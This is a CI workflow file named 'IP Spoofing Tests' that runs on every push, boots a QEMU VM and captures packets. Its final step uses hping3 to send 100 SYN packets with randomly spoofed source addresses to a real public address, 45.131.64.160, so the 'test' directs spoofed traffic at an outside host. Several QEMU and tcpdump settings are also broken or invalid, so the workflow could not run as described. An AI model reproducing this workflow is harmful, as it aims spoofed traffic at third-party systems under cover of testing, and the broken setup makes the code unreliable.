name: IP Spoofing Tests
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install dependencies
        run: sudo apt-get install -y qemu-system-x86_64 qemu-img hping3 tcpdump
      - name: Create QEMU image
        run: |
          qemu-img create -f qcow2 spoofing-test.qcow2 10G
      - name: Configure network for spoofing
        run: |
          # Enable IP forwarding in VM
          echo 'net.ipv4.ip_forward = 1' | sudo tee -a /etc/sysctl.conf
          sudo sysctl -p
      - name: Start VM with spoofing support
        run: |
          qemu-system-x86_64 \
            -enable-kvm \
            -m 1024 \
            -drive file=spoofing-test.qcow2,format=qcow2 \
            -device virtio-net-pci,netdev=net0,netdev=net1 \
            -netdev user,id=net0,hostfwd=tcp::2222-:22 \
            -netdev user,id=net1,snoop=on
      - name: Capture and analyze spoofed packets
        run: |
          timeout 60s tcpdump -i net1 -w spoofed.pcap &
          sleep 5
          for i in {1..100}; do
            spoofed_ip=$(shuf -i 10-254 -n 1).$(shuf -i 10-254 -n 1).$(shuf -i 10-254 -n 1).$(shuf -i 10-254 -n 1)
            hping3 -c 1 -S -p 19081 --spoof $spoofed_ip 45.131.64.160
          done
          sleep 5
          tcpdump -r spoofed.pcap -nn -v
